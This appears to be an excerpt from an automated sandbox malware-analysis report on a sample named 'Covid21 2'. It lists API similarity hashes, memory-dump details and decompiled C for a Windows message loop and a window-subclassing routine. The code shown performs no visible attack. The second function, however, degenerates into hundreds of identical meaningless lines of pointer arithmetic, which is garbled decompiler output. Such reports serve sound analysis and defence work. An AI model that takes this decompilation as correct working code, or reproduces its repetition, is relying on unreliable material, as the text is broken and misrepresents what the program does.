                                  Similarity
                                  • API ID: AddressLibraryProcstrlen$FreeInitializeLoadmemsetstrncpy
                                  • String ID: @$SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                  • API String ID: 4028521140-1801489780
                                  • Opcode ID: 07aa67b6d2d60c29585954675d6b4e4e6dedb6c4a4368b4edd8143cc4fd8dddb
                                  • Instruction ID: ea8c443e7643bfdbcdfbd2f4adfdb3851681cb8806fbf168f8689d10ea387318
                                  • Opcode Fuzzy Hash: 07aa67b6d2d60c29585954675d6b4e4e6dedb6c4a4368b4edd8143cc4fd8dddb
                                  • Instruction Fuzzy Hash: 35418F71800208AFDB11AFA5CC45ADE7FB8AF05315F0080BAF554B7292D7B99E14CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404F24, Relevance: 16.6, APIs: 11, Instructions: 121windowmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00404F24(long _a4) {
				struct tagMSG _v32;
				void* _t35;
				void* _t36;
				void* _t40;
				long _t45;
				void* _t57;
				struct HWND__* _t61;
				void* _t63;
				void* _t69;

				_t69 = E0040642D( *0x40b478);
				_t35 =  *(_t69 + 0x54);
				if(_t35 == 0) {
					L4:
					_t36 =  *(_t69 + 0x18);
					 *(_t69 + 8) =  *(_t69 + 8) | 0xffffffff;
					if(_t36 == 0) {
						if(_a4 == 0xffffffff) {
							GetMessageA( &_v32, 0, 0, 0);
							L15:
							_t61 = GetActiveWindow();
							_t40 = E00405D3C(_t63, _t61);
							if(_t40 == 0) {
								L17:
								TranslateMessage( &_v32);
								DispatchMessageA( &_v32);
								L18:
								_t45 =  *((intOrPtr*)(_t69 + 0xc));
								if(_t45 == 0) {
									_a4 = _v32.message;
									 *((intOrPtr*)(_t69 + 0x10)) = _v32.wParam;
									 *((intOrPtr*)(_t69 + 0x14)) = _v32.lParam;
								} else {
									_a4 = _t45;
									 *((intOrPtr*)(_t69 + 0xc)) = 0;
								}
								L21:
								return _a4;
							}
							_push( &_v32);
							_push(_t40);
							_push(_t61);
							if( *0x40a820() != 0) {
								goto L18;
							}
							goto L17;
						}
						if(PeekMessageA( &_v32, 0, 0, 0, 3) != 0) {
							goto L15;
						}
						if(_a4 != 0) {
							if(MsgWaitForMultipleObjects(0, 0, 0, _a4, 0x1ff) == 0x102) {
								goto L10;
							}
							if(PeekMessageA( &_v32, 0, 0, 0, 3) != 0) {
								goto L15;
							}
						}
						L10:
						return 0;
					}
					_a4 =  *(_t36 + 4);
					 *((intOrPtr*)(_t69 + 4)) =  *((intOrPtr*)(_t36 + 8));
					 *((intOrPtr*)(_t69 + 0xc)) = 0;
					 *(_t69 + 0x18) =  *_t36;
					HeapFree( *0x40b13c, 0, _t36);
					if( *(_t69 + 0x18) == 0) {
						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					}
					goto L21;
				}
				_t57 =  *(_t35 + 0x14);
				if(_t57 != 0) {
					HeapFree( *0x40b13c, 0, _t57);
				}
				HeapFree( *0x40b13c, 0,  *(_t69 + 0x54));
				 *(_t69 + 0x54) = 0;
				goto L4;
			}












                                  0x00404f3e
                                  0x00404f40
                                  0x00404f47
                                  0x00404f69
                                  0x00404f69
                                  0x00404f6c
                                  0x00404f72
                                  0x00404faa
                                  0x00404ff7
                                  0x00404ffd
                                  0x00405003
                                  0x00405006
                                  0x0040500d
                                  0x0040501f
                                  0x00405023
                                  0x0040502d
                                  0x00405033
                                  0x00405033
                                  0x00405038
                                  0x00405045
                                  0x0040504b
                                  0x00405051
                                  0x0040503a
                                  0x0040503a
                                  0x0040503d
                                  0x0040503d
                                  0x00405054
                                  0x00000000
                                  0x00405054
                                  0x00405012
                                  0x00405013
                                  0x00405014
                                  0x0040501d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040501d
                                  0x00404fbc
                                  0x00000000
                                  0x00000000
                                  0x00404fc1
                                  0x00404fe0
                                  0x00000000
                                  0x00000000
                                  0x00404fef
                                  0x00000000
                                  0x00000000
                                  0x00404ff1
                                  0x00404fc3
                                  0x00000000
                                  0x00404fc3
                                  0x00404f77
                                  0x00404f7d
                                  0x00404f80
                                  0x00404f87
                                  0x00404f90
                                  0x00404f95
                                  0x00404f9b
                                  0x00404f9b
                                  0x00000000
                                  0x00404f95
                                  0x00404f49
                                  0x00404f4e
                                  0x00404f58
                                  0x00404f58
                                  0x00404f64
                                  0x00404f66
                                  0x00000000

                                  APIs
                                  • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,BDFINOPS,00000000,NOPS,OPS,00000000,00000000,00000000), ref: 00404F58
                                  • HeapFree.KERNEL32(00000000,?,?,?,00000000,BDFINOPS,00000000,NOPS,OPS,00000000,00000000,00000000), ref: 00404F64
                                  • HeapFree.KERNEL32(00000000,?,?,?,00000000,BDFINOPS,00000000,NOPS,OPS,00000000,00000000,00000000), ref: 00404F90
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FB8
                                  • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,000000FF,000001FF), ref: 00404FD5
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FEB
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404FF7
                                  • GetActiveWindow.USER32 ref: 00404FFD
                                  • TranslateAccelerator.USER32(00000000,00000000,?), ref: 00405015
                                  • TranslateMessage.USER32(?), ref: 00405023
                                  • DispatchMessageA.USER32(?), ref: 0040502D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Message$FreeHeap$PeekTranslate$AcceleratorActiveDispatchMultipleObjectsWaitWindow
                                  • String ID:
                                  • API String ID: 1286715895-0
                                  • Opcode ID: a9216ed72947d2e8546aa282aeab8c230ae6b6ec53debb515884c6e6a5cbfe9e
                                  • Instruction ID: 6edb0f9935199db0e56a2c8fe76ef196a0bcbb4c32eec9ba7cc802ce8dc129a4
                                  • Opcode Fuzzy Hash: a9216ed72947d2e8546aa282aeab8c230ae6b6ec53debb515884c6e6a5cbfe9e
                                  • Instruction Fuzzy Hash: 6C414CB1900705AFCB20DF65DD88C6BBBF8EB85740710853AF556E62A0D338D941CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407EE3, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 94memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E00407EE3(struct HWND__* _a4, intOrPtr _a96) {
				void* _v3;
				void* _v5;
				struct HWND__* _v8;
				signed int _v48;
				char _v60;
				void _t68;
				signed int _t69;
				void* _t79;
				void* _t80;
				void* _t87;
				struct HWND__* _t88;
				struct HWND__* _t89;
				void* _t90;
				signed char _t95;
				void* _t96;
				signed int* _t97;
				void* _t104;
				void* _t106;
				struct HWND__** _t107;
				signed int _t108;
				signed int _t114;
				void* _t117;
				signed int* _t134;
				signed int _t136;
				signed int _t137;
				void* _t138;
				signed char _t140;
				signed int _t142;
				signed int _t148;
				signed int _t157;
				signed int _t158;

				_t107 = E0040642D( *0x40b470);
				if(_t107[4] != 0) {
					_t68 =  *(_t107[3]);
				} else {
					_t68 =  *_t107;
				}
				_t88 = _a4;
				_v8 = _t68;
				if(_t88 != 0) {
					_push(_t96);
					sprintf( &_v60, "PB_GadgetStack_%i",  *0x40b140);
					_t114 = _t114 + 0xc;
					if(_v8 != 0) {
						_t87 = GetPropA(_v8,  &_v60);
						 *(_t87 + 4) =  *_t107;
						 *(_t87 + 8) = _t107[3];
						 *(_t87 + 0xc) = _t107[4];
						 *(_t87 + 0x10) = _t107[5];
						_t107[3] = _t107[3] & 0x00000000;
					}
					_t104 = GetPropA(_t88,  &_v60);
					_t89 = 0;
					if(_t104 == 0) {
						if(_t107[3] != 0) {
							_t107[4] = 0;
						} else {
							_t79 = RtlAllocateHeap( *0x40b13c, 8, 0x28);
							_t107[4] = _t107[4] & 0x00000000;
							_t107[3] = _t79;
							_t107[5] = 0xa;
						}
						 *_t107 = _t88;
						_t106 = RtlAllocateHeap( *0x40b13c, 8, 0x18);
						 *_t106 = _t88;
						SetPropA(_t88,  &_v60, _t106);
						 *((intOrPtr*)(_t106 + 0x14)) = SetWindowLongA(_t88, 0xfffffffc, E00407E1A);
					} else {
						_t80 = _t107[3];
						if(_t80 != 0) {
							HeapFree( *0x40b13c, 0, _t80);
						}
						 *_t107 =  *(_t104 + 4);
						_t107[3] =  *(_t104 + 8);
						_t107[4] =  *(_t104 + 0xc);
						_t107[5] =  *(_t104 + 0x10);
						 *(_t104 + 8) =  *(_t104 + 8) & 0x00000000;
					}
					_t107[1] = _t107[1] & 0x00000000;
					_pop(_t96);
				}
				_t69 = _v8;
				_pop(_t108);
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
				 *_t69 =  *_t69 + _t69;
